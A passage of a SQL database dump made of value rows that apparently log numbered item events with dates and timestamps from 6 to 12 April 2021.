11:11:20'),(18197,2704,1,'2021-04-06','2021-04-06 11:18:09'),(18198,1608,1,'2021-04-06','2021-04-06 11:20:52'),(18199,2775,1,'2021-04-06','2021-04-06 11:26:56'),(18200,1586,1,'2021-04-06','2021-04-06 11:28:45'),(18201,487,1,'2021-04-06','2021-04-06 11:34:29'),(18202,1870,1,'2021-04-06','2021-04-06 11:38:40'),(18203,1592,1,'2021-04-06','2021-04-06 11:38:45'),(18204,1586,1,'2021-04-06','2021-04-06 11:43:02'),(18205,1594,1,'2021-04-06','2021-04-06 11:55:11'),(18206,76,1,'2021-04-06','2021-04-06 12:07:37'),(18207,1602,1,'2021-04-06','2021-04-06 12:53:01'),(18208,2457,1,'2021-04-06','2021-04-06 13:24:42'),(18209,2704,1,'2021-04-06','2021-04-06 13:32:51'),(18210,1602,1,'2021-04-06','2021-04-06 13:50:27'),(18211,68,1,'2021-04-06','2021-04-06 13:50:43'),(18212,1602,1,'2021-04-06','2021-04-06 13:51:21'),(18213,2309,1,'2021-04-06','2021-04-06 13:59:00'),(18214,1586,1,'2021-04-06','2021-04-06 13:59:21'),(18215,1699,1,'2021-04-06','2021-04-06 14:02:29'),(18216,1586,1,'2021-04-06','2021-04-06 14:02:49'),(18217,1707,1,'2021-04-06','2021-04-06 14:03:21'),(18218,1586,1,'2021-04-06','2021-04-06 14:12:33'),(18219,1774,1,'2021-04-06','2021-04-06 14:16:24'),(18220,2154,1,'2021-04-06','2021-04-06 14:39:07'),(18221,3269,1,'2021-04-06','2021-04-06 14:49:16'),(18222,72,1,'2021-04-06','2021-04-06 14:52:57'),(18223,3673,1,'2021-04-06','2021-04-06 14:53:33'),(18224,91,1,'2021-04-06','2021-04-06 15:10:09'),(18225,72,1,'2021-04-06','2021-04-06 15:20:52'),(18226,3674,1,'2021-04-06','2021-04-06 15:21:01'),(18227,3674,1,'2021-04-06','2021-04-06 15:21:20'),(18228,3674,1,'2021-04-06','2021-04-06 15:29:15'),(18229,72,1,'2021-04-06','2021-04-06 15:29:22'),(18230,3674,1,'2021-04-06','2021-04-06 15:29:37'),(18231,72,1,'2021-04-06','2021-04-06 15:31:54'),(18232,3673,1,'2021-04-06','2021-04-06 15:32:32'),(18233,2309,1,'2021-04-06','2021-04-06 15:39:25'),(18234,1604,1,'2021-04-06','2021-04-06 16:00:13'),(18235,1582,1,'2021-04-06','2021-04-06 16:05:23'),(18236,1592,1,'2021-04-06','2021-04-06 16:32:40'),(18237,2911,1,'2021-04-06','2021-04-06 17:33:44'),(18238,1582,1,'2021-04-06','2021-04-06 18:07:58'),(18239,2457,1,'2021-04-06','2021-04-06 18:30:37'),(18240,1586,1,'2021-04-06','2021-04-06 20:54:19'),(18241,3541,1,'2021-04-06','2021-04-06 21:00:44'),(18242,1586,1,'2021-04-06','2021-04-06 21:02:38'),(18243,68,1,'2021-04-06','2021-04-06 21:02:53'),(18244,1586,1,'2021-04-06','2021-04-06 21:04:05'),(18245,1602,1,'2021-04-06','2021-04-06 21:43:18'),(18246,474,1,'2021-04-06','2021-04-06 21:46:13'),(18247,1586,1,'2021-04-06','2021-04-06 21:52:03'),(18248,1586,1,'2021-04-06','2021-04-06 21:52:32'),(18249,1586,1,'2021-04-06','2021-04-06 21:59:04'),(18250,467,1,'2021-04-06','2021-04-06 22:07:23'),(18251,80,1,'2021-04-06','2021-04-06 22:59:24'),(18252,1594,1,'2021-04-07','2021-04-07 02:35:52'),(18253,1600,1,'2021-04-07','2021-04-07 03:06:24'),(18254,3673,1,'2021-04-07','2021-04-07 03:37:17'),(18255,1612,1,'2021-04-07','2021-04-07 05:58:03'),(18256,2159,1,'2021-04-07','2021-04-07 07:44:02'),(18257,1594,1,'2021-04-07','2021-04-07 08:34:55'),(18258,1600,1,'2021-04-07','2021-04-07 08:45:21'),(18259,80,1,'2021-04-07','2021-04-07 08:45:45'),(18260,80,1,'2021-04-07','2021-04-07 08:47:12'),(18261,1600,1,'2021-04-07','2021-04-07 08:47:37'),(18262,3041,1,'2021-04-07','2021-04-07 08:57:59'),(18263,1602,1,'2021-04-07','2021-04-07 09:04:33'),(18264,1602,1,'2021-04-07','2021-04-07 09:25:21'),(18265,3273,1,'2021-04-07','2021-04-07 09:26:30'),(18266,1602,1,'2021-04-07','2021-04-07 09:53:29'),(18267,487,1,'2021-04-07','2021-04-07 09:54:09'),(18268,1602,1,'2021-04-07','2021-04-07 09:54:38'),(18269,1602,1,'2021-04-07','2021-04-07 09:54:44'),(18270,3541,1,'2021-04-07','2021-04-07 10:05:27'),(18271,1602,1,'2021-04-07','2021-04-07 10:09:41'),(18272,2309,1,'2021-04-07','2021-04-07 10:17:02'),(18273,2751,1,'2021-04-07','2021-04-07 10:24:12'),(18274,2309,1,'2021-04-07','2021-04-07 10:25:22'),(18275,2410,1,'2021-04-07','2021-04-07 11:28:25'),(18276,3674,1,'2021-04-07','2021-04-07 11:39:02'),(18277,1604,1,'2021-04-07','2021-04-07 11:59:54'),(18278,1604,1,'2021-04-07','2021-04-07 12:01:26'),(18279,68,1,'2021-04-07','2021-04-07 12:07:01'),(18280,76,1,'2021-04-07','2021-04-07 12:13:44'),(18281,1608,1,'2021-04-07','2021-04-07 12:15:18'),(18282,76,1,'2021-04-07','2021-04-07 12:17:30'),(18283,2309,1,'2021-04-07','2021-04-07 12:21:41'),(18284,2309,1,'2021-04-07','2021-04-07 12:21:56'),(18285,2309,1,'2021-04-07','2021-04-07 12:22:25'),(18286,3005,1,'2021-04-07','2021-04-07 13:06:25'),(18287,2309,1,'2021-04-07','2021-04-07 13:27:49'),(18288,1602,1,'2021-04-07','2021-04-07 13:29:06'),(18289,2309,1,'2021-04-07','2021-04-07 13:37:22'),(18290,2309,1,'2021-04-07','2021-04-07 14:07:20'),(18291,1602,1,'2021-04-07','2021-04-07 14:31:01'),(18292,1602,1,'2021-04-07','2021-04-07 14:31:55'),(18293,3316,1,'2021-04-07','2021-04-07 15:07:36'),(18294,3438,1,'2021-04-07','2021-04-07 15:08:04'),(18295,3482,1,'2021-04-07','2021-04-07 15:09:43'),(18296,1594,1,'2021-04-07','2021-04-07 15:53:40'),(18297,3099,1,'2021-04-07','2021-04-07 16:14:02'),(18298,1592,1,'2021-04-07','2021-04-07 16:25:18'),(18299,1718,1,'2021-04-07','2021-04-07 16:37:28'),(18300,1582,1,'2021-04-07','2021-04-07 16:42:52'),(18301,1602,1,'2021-04-07','2021-04-07 16:43:55'),(18302,1604,1,'2021-04-07','2021-04-07 16:44:06'),(18303,1586,1,'2021-04-07','2021-04-07 16:49:24'),(18304,80,1,'2021-04-07','2021-04-07 16:50:32'),(18305,467,1,'2021-04-07','2021-04-07 16:51:47'),(18306,68,1,'2021-04-07','2021-04-07 16:53:22'),(18307,68,1,'2021-04-07','2021-04-07 16:53:36'),(18308,80,1,'2021-04-07','2021-04-07 16:55:56'),(18309,1586,1,'2021-04-07','2021-04-07 16:55:58'),(18310,80,1,'2021-04-07','2021-04-07 16:56:52'),(18311,1586,1,'2021-04-07','2021-04-07 16:57:30'),(18312,1586,1,'2021-04-07','2021-04-07 16:57:39'),(18313,1697,1,'2021-04-07','2021-04-07 16:58:01'),(18314,1586,1,'2021-04-07','2021-04-07 17:09:58'),(18315,1586,1,'2021-04-07','2021-04-07 17:10:00'),(18316,1586,1,'2021-04-07','2021-04-07 17:10:08'),(18317,1604,1,'2021-04-07','2021-04-07 17:29:08'),(18318,1602,1,'2021-04-07','2021-04-07 17:30:00'),(18319,1586,1,'2021-04-07','2021-04-07 20:15:02'),(18320,2309,1,'2021-04-07','2021-04-07 20:48:08'),(18321,1600,1,'2021-04-07','2021-04-07 20:56:47'),(18322,1582,1,'2021-04-07','2021-04-07 21:42:45'),(18323,1600,1,'2021-04-07','2021-04-07 22:11:18'),(18324,1582,1,'2021-04-07','2021-04-07 22:12:00'),(18325,2457,1,'2021-04-07','2021-04-07 22:20:57'),(18326,1594,1,'2021-04-07','2021-04-07 22:26:44'),(18327,1594,1,'2021-04-07','2021-04-07 22:30:19'),(18328,1594,1,'2021-04-07','2021-04-07 22:31:25'),(18329,3030,1,'2021-04-07','2021-04-07 22:53:12'),(18330,1602,1,'2021-04-07','2021-04-07 23:20:54'),(18331,1602,1,'2021-04-07','2021-04-07 23:20:55'),(18332,1602,1,'2021-04-07','2021-04-07 23:23:05'),(18333,1870,1,'2021-04-07','2021-04-07 23:53:51'),(18334,3030,1,'2021-04-08','2021-04-08 05:29:22'),(18335,87,1,'2021-04-08','2021-04-08 05:31:59'),(18336,488,1,'2021-04-08','2021-04-08 05:33:20'),(18337,2457,1,'2021-04-08','2021-04-08 06:10:32'),(18338,3269,1,'2021-04-08','2021-04-08 06:17:22'),(18339,1726,1,'2021-04-08','2021-04-08 06:22:20'),(18340,3030,1,'2021-04-08','2021-04-08 06:27:24'),(18341,3030,1,'2021-04-08','2021-04-08 06:27:46'),(18342,2457,1,'2021-04-08','2021-04-08 06:32:48'),(18343,1588,1,'2021-04-08','2021-04-08 06:51:43'),(18344,2457,1,'2021-04-08','2021-04-08 07:25:25'),(18345,1594,1,'2021-04-08','2021-04-08 08:01:37'),(18346,1586,1,'2021-04-08','2021-04-08 08:06:21'),(18347,2617,1,'2021-04-08','2021-04-08 08:24:32'),(18348,80,1,'2021-04-08','2021-04-08 08:24:52'),(18349,1586,1,'2021-04-08','2021-04-08 08:28:01'),(18350,2457,1,'2021-04-08','2021-04-08 09:35:51'),(18351,80,1,'2021-04-08','2021-04-08 09:38:08'),(18352,80,1,'2021-04-08','2021-04-08 09:38:50'),(18353,72,1,'2021-04-08','2021-04-08 10:19:24'),(18354,1592,1,'2021-04-08','2021-04-08 10:21:13'),(18355,72,1,'2021-04-08','2021-04-08 10:36:44'),(18356,3680,1,'2021-04-08','2021-04-08 10:40:14'),(18357,72,1,'2021-04-08','2021-04-08 10:46:59'),(18358,1586,1,'2021-04-08','2021-04-08 11:00:08'),(18359,1726,1,'2021-04-08','2021-04-08 11:02:54'),(18360,2395,1,'2021-04-08','2021-04-08 11:21:21'),(18361,2609,1,'2021-04-08','2021-04-08 11:31:20'),(18362,472,1,'2021-04-08','2021-04-08 11:37:19'),(18363,2457,1,'2021-04-08','2021-04-08 12:02:58'),(18364,80,1,'2021-04-08','2021-04-08 12:03:55'),(18365,2457,1,'2021-04-08','2021-04-08 12:04:39'),(18366,76,1,'2021-04-08','2021-04-08 12:06:04'),(18367,2457,1,'2021-04-08','2021-04-08 12:06:26'),(18368,1726,1,'2021-04-08','2021-04-08 12:07:37'),(18369,72,1,'2021-04-08','2021-04-08 12:18:53'),(18370,1606,1,'2021-04-08','2021-04-08 12:54:49'),(18371,2609,1,'2021-04-08','2021-04-08 13:09:59'),(18372,2609,1,'2021-04-08','2021-04-08 13:10:11'),(18373,1596,1,'2021-04-08','2021-04-08 13:17:33'),(18374,3083,1,'2021-04-08','2021-04-08 13:42:58'),(18375,3083,1,'2021-04-08','2021-04-08 13:43:56'),(18376,1614,1,'2021-04-08','2021-04-08 13:59:09'),(18377,76,1,'2021-04-08','2021-04-08 13:59:35'),(18378,80,1,'2021-04-08','2021-04-08 13:59:51'),(18379,76,1,'2021-04-08','2021-04-08 14:08:23'),(18380,2658,1,'2021-04-08','2021-04-08 14:17:09'),(18381,1586,1,'2021-04-08','2021-04-08 14:41:44'),(18382,2609,1,'2021-04-08','2021-04-08 14:52:58'),(18383,1598,1,'2021-04-08','2021-04-08 15:02:40'),(18384,3680,1,'2021-04-08','2021-04-08 15:44:05'),(18385,1602,1,'2021-04-08','2021-04-08 16:18:10'),(18386,1608,1,'2021-04-08','2021-04-08 16:47:56'),(18387,89,1,'2021-04-08','2021-04-08 16:57:20'),(18388,2457,1,'2021-04-08','2021-04-08 19:44:49'),(18389,1594,1,'2021-04-08','2021-04-08 19:57:27'),(18390,1594,1,'2021-04-08','2021-04-08 19:57:29'),(18391,473,1,'2021-04-08','2021-04-08 20:10:20'),(18392,3534,1,'2021-04-08','2021-04-08 20:10:47'),(18393,84,1,'2021-04-08','2021-04-08 20:12:27'),(18394,68,1,'2021-04-08','2021-04-08 20:12:34'),(18395,76,1,'2021-04-08','2021-04-08 20:13:30'),(18396,72,1,'2021-04-08','2021-04-08 20:14:24'),(18397,108,1,'2021-04-08','2021-04-08 20:14:33'),(18398,2161,1,'2021-04-08','2021-04-08 20:14:41'),(18399,2503,1,'2021-04-08','2021-04-08 20:14:49'),(18400,80,1,'2021-04-08','2021-04-08 20:15:07'),(18401,2503,1,'2021-04-08','2021-04-08 20:15:15'),(18402,3265,1,'2021-04-08','2021-04-08 20:45:35'),(18403,2159,1,'2021-04-08','2021-04-08 21:02:44'),(18404,2161,1,'2021-04-08','2021-04-08 21:15:28'),(18405,472,1,'2021-04-08','2021-04-08 21:19:19'),(18406,2150,1,'2021-04-08','2021-04-08 21:41:02'),(18407,2457,1,'2021-04-08','2021-04-08 22:16:03'),(18408,486,1,'2021-04-08','2021-04-08 22:20:21'),(18409,3261,1,'2021-04-08','2021-04-08 22:45:34'),(18410,1612,1,'2021-04-08','2021-04-08 23:10:34'),(18411,570,1,'2021-04-08','2021-04-08 23:15:19'),(18412,1870,1,'2021-04-08','2021-04-08 23:26:52'),(18413,2159,1,'2021-04-09','2021-04-09 01:32:18'),(18414,2159,1,'2021-04-09','2021-04-09 01:32:20'),(18415,1594,1,'2021-04-09','2021-04-09 03:03:24'),(18416,1594,1,'2021-04-09','2021-04-09 03:06:33'),(18417,1586,1,'2021-04-09','2021-04-09 04:59:27'),(18418,1586,1,'2021-04-09','2021-04-09 04:59:29'),(18419,1606,1,'2021-04-09','2021-04-09 05:34:53'),(18420,1606,1,'2021-04-09','2021-04-09 05:36:31'),(18421,1606,1,'2021-04-09','2021-04-09 05:36:42'),(18422,1606,1,'2021-04-09','2021-04-09 05:36:57'),(18423,1594,1,'2021-04-09','2021-04-09 07:22:27'),(18424,2704,1,'2021-04-09','2021-04-09 07:55:07'),(18425,1598,1,'2021-04-09','2021-04-09 08:34:40'),(18426,1600,1,'2021-04-09','2021-04-09 08:37:15'),(18427,2769,1,'2021-04-09','2021-04-09 09:04:10'),(18428,1600,1,'2021-04-09','2021-04-09 09:55:01'),(18429,80,1,'2021-04-09','2021-04-09 10:42:15'),(18430,80,1,'2021-04-09','2021-04-09 11:19:33'),(18431,1586,1,'2021-04-09','2021-04-09 11:30:28'),(18432,1586,1,'2021-04-09','2021-04-09 11:30:28'),(18433,1586,1,'2021-04-09','2021-04-09 11:30:45'),(18434,1586,1,'2021-04-09','2021-04-09 11:31:08'),(18435,1586,1,'2021-04-09','2021-04-09 11:31:28'),(18436,2309,1,'2021-04-09','2021-04-09 11:34:59'),(18437,1586,1,'2021-04-09','2021-04-09 11:47:47'),(18438,68,1,'2021-04-09','2021-04-09 11:50:38'),(18439,1582,1,'2021-04-09','2021-04-09 12:58:25'),(18440,1582,1,'2021-04-09','2021-04-09 12:58:31'),(18441,1722,1,'2021-04-09','2021-04-09 13:16:36'),(18442,1602,1,'2021-04-09','2021-04-09 13:19:44'),(18443,1588,1,'2021-04-09','2021-04-09 13:32:55'),(18444,1594,1,'2021-04-09','2021-04-09 13:36:40'),(18445,1594,1,'2021-04-09','2021-04-09 13:37:11'),(18446,1726,1,'2021-04-09','2021-04-09 13:38:24'),(18447,1594,1,'2021-04-09','2021-04-09 13:39:24'),(18448,1594,1,'2021-04-09','2021-04-09 13:40:18'),(18449,1594,1,'2021-04-09','2021-04-09 13:44:29'),(18450,3058,1,'2021-04-09','2021-04-09 13:57:18'),(18451,2410,1,'2021-04-09','2021-04-09 14:08:53'),(18452,3675,1,'2021-04-09','2021-04-09 14:20:21'),(18453,1586,1,'2021-04-09','2021-04-09 14:21:07'),(18454,3058,1,'2021-04-09','2021-04-09 14:53:43'),(18455,2991,1,'2021-04-09','2021-04-09 15:28:51'),(18456,3226,1,'2021-04-09','2021-04-09 15:36:54'),(18457,3175,1,'2021-04-09','2021-04-09 16:16:53'),(18458,1586,1,'2021-04-09','2021-04-09 16:57:20'),(18459,2911,1,'2021-04-09','2021-04-09 17:25:08'),(18460,2911,1,'2021-04-09','2021-04-09 17:25:57'),(18461,1586,1,'2021-04-09','2021-04-09 18:30:00'),(18462,2309,1,'2021-04-09','2021-04-09 18:59:37'),(18463,2704,1,'2021-04-09','2021-04-09 19:40:24'),(18464,2704,1,'2021-04-09','2021-04-09 19:40:26'),(18465,2769,1,'2021-04-09','2021-04-09 23:58:34'),(18466,80,1,'2021-04-10','2021-04-10 00:01:12'),(18467,80,1,'2021-04-10','2021-04-10 00:08:32'),(18468,2490,1,'2021-04-10','2021-04-10 00:18:31'),(18469,570,1,'2021-04-10','2021-04-10 02:28:59'),(18470,2309,1,'2021-04-10','2021-04-10 03:09:19'),(18471,91,1,'2021-04-10','2021-04-10 04:28:50'),(18472,2751,1,'2021-04-10','2021-04-10 05:24:13'),(18473,76,1,'2021-04-10','2021-04-10 05:41:00'),(18474,76,1,'2021-04-10','2021-04-10 05:41:31'),(18475,2751,1,'2021-04-10','2021-04-10 05:41:34'),(18476,80,1,'2021-04-10','2021-04-10 07:20:14'),(18477,2159,1,'2021-04-10','2021-04-10 07:54:54'),(18478,1600,1,'2021-04-10','2021-04-10 08:20:42'),(18479,1774,1,'2021-04-10','2021-04-10 08:21:28'),(18480,1600,1,'2021-04-10','2021-04-10 08:21:47'),(18481,570,1,'2021-04-10','2021-04-10 08:54:15'),(18482,2775,1,'2021-04-10','2021-04-10 10:44:46'),(18483,1592,1,'2021-04-10','2021-04-10 10:56:57'),(18484,1594,1,'2021-04-10','2021-04-10 11:04:21'),(18485,2159,1,'2021-04-10','2021-04-10 11:13:49'),(18486,3438,1,'2021-04-10','2021-04-10 11:14:56'),(18487,2769,1,'2021-04-10','2021-04-10 11:26:51'),(18488,2769,1,'2021-04-10','2021-04-10 11:26:52'),(18489,1594,1,'2021-04-10','2021-04-10 11:45:09'),(18490,1594,1,'2021-04-10','2021-04-10 11:47:28'),(18491,1586,1,'2021-04-10','2021-04-10 11:51:32'),(18492,1697,1,'2021-04-10','2021-04-10 11:52:21'),(18493,1586,1,'2021-04-10','2021-04-10 11:52:29'),(18494,3273,1,'2021-04-10','2021-04-10 12:04:52'),(18495,72,1,'2021-04-10','2021-04-10 12:33:31'),(18496,3585,1,'2021-04-10','2021-04-10 12:33:54'),(18497,72,1,'2021-04-10','2021-04-10 12:34:16'),(18498,72,1,'2021-04-10','2021-04-10 12:34:25'),(18499,72,1,'2021-04-10','2021-04-10 12:34:40'),(18500,1718,1,'2021-04-10','2021-04-10 12:36:13'),(18501,1604,1,'2021-04-10','2021-04-10 12:41:33'),(18502,76,1,'2021-04-10','2021-04-10 12:42:08'),(18503,1604,1,'2021-04-10','2021-04-10 12:42:41'),(18504,3534,1,'2021-04-10','2021-04-10 12:45:24'),(18505,80,1,'2021-04-10','2021-04-10 13:05:14'),(18506,1586,1,'2021-04-10','2021-04-10 13:09:37'),(18507,1586,1,'2021-04-10','2021-04-10 13:09:38'),(18508,1604,1,'2021-04-10','2021-04-10 13:13:42'),(18509,2769,1,'2021-04-10','2021-04-10 13:30:31'),(18510,2769,1,'2021-04-10','2021-04-10 13:37:34'),(18511,2704,1,'2021-04-10','2021-04-10 14:44:47'),(18512,2704,1,'2021-04-10','2021-04-10 14:44:52'),(18513,3316,1,'2021-04-10','2021-04-10 14:56:45'),(18514,1598,1,'2021-04-10','2021-04-10 14:59:49'),(18515,1586,1,'2021-04-10','2021-04-10 15:01:39'),(18516,1596,1,'2021-04-10','2021-04-10 15:26:52'),(18517,2971,1,'2021-04-10','2021-04-10 15:54:14'),(18518,1612,1,'2021-04-10','2021-04-10 15:56:59'),(18519,1602,1,'2021-04-10','2021-04-10 16:25:43'),(18520,1602,1,'2021-04-10','2021-04-10 16:25:45'),(18521,1608,1,'2021-04-10','2021-04-10 16:58:13'),(18522,1592,1,'2021-04-10','2021-04-10 17:17:07'),(18523,2419,1,'2021-04-10','2021-04-10 17:56:54'),(18524,2419,1,'2021-04-10','2021-04-10 17:56:58'),(18525,570,1,'2021-04-10','2021-04-10 18:07:59'),(18526,1586,1,'2021-04-10','2021-04-10 20:54:45'),(18527,1586,1,'2021-04-10','2021-04-10 20:54:46'),(18528,1586,1,'2021-04-10','2021-04-10 20:56:07'),(18529,1606,1,'2021-04-10','2021-04-10 21:39:26'),(18530,484,1,'2021-04-10','2021-04-10 21:39:32'),(18531,2159,1,'2021-04-10','2021-04-10 21:47:39'),(18532,2159,1,'2021-04-10','2021-04-10 21:47:44'),(18533,2159,1,'2021-04-10','2021-04-10 21:48:00'),(18534,2159,1,'2021-04-10','2021-04-10 21:48:13'),(18535,3680,1,'2021-04-10','2021-04-10 22:07:13'),(18536,2775,1,'2021-04-10','2021-04-10 23:10:06'),(18537,1594,1,'2021-04-11','2021-04-11 00:56:11'),(18538,3030,1,'2021-04-11','2021-04-11 01:00:48'),(18539,3534,1,'2021-04-11','2021-04-11 01:10:32'),(18540,1582,1,'2021-04-11','2021-04-11 01:30:31'),(18541,1594,1,'2021-04-11','2021-04-11 01:31:55'),(18542,1594,1,'2021-04-11','2021-04-11 01:31:59'),(18543,1594,1,'2021-04-11','2021-04-11 01:33:15'),(18544,2609,1,'2021-04-11','2021-04-11 01:40:33'),(18545,3104,1,'2021-04-11','2021-04-11 02:20:31'),(18546,1604,1,'2021-04-11','2021-04-11 02:30:29'),(18547,1586,1,'2021-04-11','2021-04-11 06:08:44'),(18548,1602,1,'2021-04-11','2021-04-11 06:32:59'),(18549,1582,1,'2021-04-11','2021-04-11 07:01:39'),(18550,3253,1,'2021-04-11','2021-04-11 07:33:42'),(18551,2769,1,'2021-04-11','2021-04-11 07:37:01'),(18552,2769,1,'2021-04-11','2021-04-11 07:37:02'),(18553,2775,1,'2021-04-11','2021-04-11 07:37:17'),(18554,2775,1,'2021-04-11','2021-04-11 07:37:21'),(18555,1614,1,'2021-04-11','2021-04-11 08:24:42'),(18556,1586,1,'2021-04-11','2021-04-11 08:53:37'),(18557,1586,1,'2021-04-11','2021-04-11 08:53:40'),(18558,1586,1,'2021-04-11','2021-04-11 08:53:41'),(18559,1586,1,'2021-04-11','2021-04-11 08:57:55'),(18560,1586,1,'2021-04-11','2021-04-11 09:21:27'),(18561,1586,1,'2021-04-11','2021-04-11 09:21:49'),(18562,3083,1,'2021-04-11','2021-04-11 09:24:15'),(18563,2609,1,'2021-04-11','2021-04-11 09:25:11'),(18564,1709,1,'2021-04-11','2021-04-11 09:30:23'),(18565,1709,1,'2021-04-11','2021-04-11 09:42:32'),(18566,1709,1,'2021-04-11','2021-04-11 09:43:10'),(18567,2989,1,'2021-04-11','2021-04-11 10:04:16'),(18568,1734,1,'2021-04-11','2021-04-11 10:11:49'),(18569,2309,1,'2021-04-11','2021-04-11 10:13:42'),(18570,76,1,'2021-04-11','2021-04-11 10:14:23'),(18571,2309,1,'2021-04-11','2021-04-11 10:14:36'),(18572,1594,1,'2021-04-11','2021-04-11 10:26:38'),(18573,1594,1,'2021-04-11','2021-04-11 10:28:06'),(18574,80,1,'2021-04-11','2021-04-11 10:28:12'),(18575,1594,1,'2021-04-11','2021-04-11 10:31:55'),(18576,1600,1,'2021-04-11','2021-04-11 10:48:27'),(18577,1608,1,'2021-04-11','2021-04-11 11:07:53'),(18578,2769,1,'2021-04-11','2021-04-11 11:08:03'),(18579,3099,1,'2021-04-11','2021-04-11 11:15:35'),(18580,1606,1,'2021-04-11','2021-04-11 11:24:59'),(18581,1600,1,'2021-04-11','2021-04-11 11:25:16'),(18582,1586,1,'2021-04-11','2021-04-11 11:38:25'),(18583,1586,1,'2021-04-11','2021-04-11 11:38:26'),(18584,1586,1,'2021-04-11','2021-04-11 11:38:34'),(18585,2904,1,'2021-04-11','2021-04-11 12:00:02'),(18586,3486,1,'2021-04-11','2021-04-11 12:21:13'),(18587,3079,1,'2021-04-11','2021-04-11 13:00:01'),(18588,1774,1,'2021-04-11','2021-04-11 13:25:34'),(18589,2558,1,'2021-04-11','2021-04-11 14:05:44'),(18590,3278,1,'2021-04-11','2021-04-11 14:26:09'),(18591,1592,1,'2021-04-11','2021-04-11 14:56:52'),(18592,1602,1,'2021-04-11','2021-04-11 15:06:13'),(18593,1602,1,'2021-04-11','2021-04-11 15:06:44'),(18594,3479,1,'2021-04-11','2021-04-11 15:06:49'),(18595,1612,1,'2021-04-11','2021-04-11 15:16:51'),(18596,1594,1,'2021-04-11','2021-04-11 15:37:27'),(18597,3058,1,'2021-04-11','2021-04-11 15:47:12'),(18598,3486,1,'2021-04-11','2021-04-11 15:52:18'),(18599,2769,1,'2021-04-11','2021-04-11 15:53:12'),(18600,1586,1,'2021-04-11','2021-04-11 15:59:55'),(18601,1582,1,'2021-04-11','2021-04-11 16:17:23'),(18602,2609,1,'2021-04-11','2021-04-11 16:53:40'),(18603,2609,1,'2021-04-11','2021-04-11 16:53:49'),(18604,1596,1,'2021-04-11','2021-04-11 17:40:20'),(18605,1600,1,'2021-04-11','2021-04-11 18:08:19'),(18606,1600,1,'2021-04-11','2021-04-11 18:08:20'),(18607,1600,1,'2021-04-11','2021-04-11 18:08:26'),(18608,3030,1,'2021-04-11','2021-04-11 18:11:14'),(18609,1594,1,'2021-04-11','2021-04-11 18:11:35'),(18610,76,1,'2021-04-11','2021-04-11 18:13:27'),(18611,76,1,'2021-04-11','2021-04-11 18:15:33'),(18612,1592,1,'2021-04-11','2021-04-11 18:15:41'),(18613,1594,1,'2021-04-11','2021-04-11 18:15:42'),(18614,1594,1,'2021-04-11','2021-04-11 18:15:55'),(18615,1594,1,'2021-04-11','2021-04-11 18:16:31'),(18616,1598,1,'2021-04-11','2021-04-11 18:17:35'),(18617,1598,1,'2021-04-11','2021-04-11 18:18:11'),(18618,1598,1,'2021-04-11','2021-04-11 18:24:25'),(18619,1598,1,'2021-04-11','2021-04-11 18:26:32'),(18620,1602,1,'2021-04-11','2021-04-11 18:37:00'),(18621,1606,1,'2021-04-11','2021-04-11 18:42:39'),(18622,1606,1,'2021-04-11','2021-04-11 18:42:40'),(18623,1606,1,'2021-04-11','2021-04-11 18:42:52'),(18624,1586,1,'2021-04-11','2021-04-11 18:49:16'),(18625,1586,1,'2021-04-11','2021-04-11 18:49:21'),(18626,1586,1,'2021-04-11','2021-04-11 18:52:14'),(18627,1586,1,'2021-04-11','2021-04-11 19:16:30'),(18628,467,1,'2021-04-11','2021-04-11 19:38:04'),(18629,1586,1,'2021-04-11','2021-04-11 19:39:24'),(18630,2769,1,'2021-04-11','2021-04-11 19:57:51'),(18631,1586,1,'2021-04-11','2021-04-11 20:03:30'),(18632,1586,1,'2021-04-11','2021-04-11 20:03:31'),(18633,2617,1,'2021-04-11','2021-04-11 20:16:22'),(18634,1586,1,'2021-04-11','2021-04-11 20:33:25'),(18635,1586,1,'2021-04-11','2021-04-11 20:34:34'),(18636,1602,1,'2021-04-11','2021-04-11 21:00:02'),(18637,1602,1,'2021-04-11','2021-04-11 21:00:03'),(18638,1602,1,'2021-04-11','2021-04-11 21:00:06'),(18639,2159,1,'2021-04-11','2021-04-11 21:04:18'),(18640,3030,1,'2021-04-11','2021-04-11 21:58:21'),(18641,1586,1,'2021-04-11','2021-04-11 22:03:06'),(18642,1600,1,'2021-04-11','2021-04-11 22:16:22'),(18643,1586,1,'2021-04-11','2021-04-11 22:43:11'),(18644,1586,1,'2021-04-11','2021-04-11 22:45:45'),(18645,2804,1,'2021-04-11','2021-04-11 23:38:29'),(18646,570,1,'2021-04-11','2021-04-11 23:59:19'),(18647,570,1,'2021-04-11','2021-04-11 23:59:39'),(18648,1598,1,'2021-04-11','2021-04-11 23:59:53'),(18649,570,1,'2021-04-12','2021-04-12 00:30:11'),(18650,1602,1,'2021-04-12','2021-04-12 00:41:47'),(18651,1602,1,'2021-04-12','2021-04-12 00:41:58'),(18652,76,1,'2021-04-12','2021-04-12 00:42:57'),(18653,3058,1,'2021-04-12','2021-04-12 00:59:11'),(18654,3253,1,'2021-04-12','2021-04-12 01:59:50'),(18655,1612,1,'2021-04-12','2021-04-12 02:09:51'),(18656,68,1,'2021-04-12','2021-04-12 02:10:11'),(18657,76,1,'2021-04-12','2021-04-12 02:12:17'),(18658,72,1,'2021-04-12','2021-04-12 02:12:33'),(18659,76,1,'2021-04-12','2021-04-12 02:12:44'),(18660,89,1,'2021-04-12','2021-04-12 02:14:28'),(18661,76,1,'2021-04-12','2021-04-12 02:14:48'),(18662,91,1,'2021-04-12','2021-04-12 02:15:08'),(18663,76,1,'2021-04-12','2021-04-12 02:15:23'),(18664,80,1,'2021-04-12','2021-04-12 02:16:21'),(18665,1726,1,'2021-04-12','2021-04-12 02:42:33'),(18666,1612,1,'2021-04-12','2021-04-12 03:00:02'),(18667,1726,1,'2021-04-12','2021-04-12 03:00:19'),(18668,2063,1,'2021-04-12','2021-04-12 03:14:23'),(18669,1582,1,'2021-04-12','2021-04-12 03:14:35'),(18670,91,1,'2021-04-12','2021-04-12 03:14:53'),(18671,1582,1,'2021-04-12','2021-04-12 03:20:01'),(18672,91,1,'2021-04-12','2021-04-12 03:20:08'),(18673,1598,1,'2021-04-12','2021-04-12 03:40:39'),(18674,486,1,'2021-04-12','2021-04-12 03:42:33'),(18675,1586,1,'2021-04-12','2021-04-12 03:50:53'),(18676,2150,1,'2021-04-12','2021-04-12 04:00:20'),(18677,3307,1,'2021-04-12','2021-04-12 04:01:08'),(18678,1718,1,'2021-04-12','2021-04-12 04:16:39'),(18679,1720,1,'2021-04-12','2021-04-12 04:16:40'),(18680,1594,1,'2021-04-12','2021-04-12 04:39:15'),(18681,1594,1,'2021-04-12','2021-04-12 04:39:43'),(18682,1594,1,'2021-04-12','2021-04-12 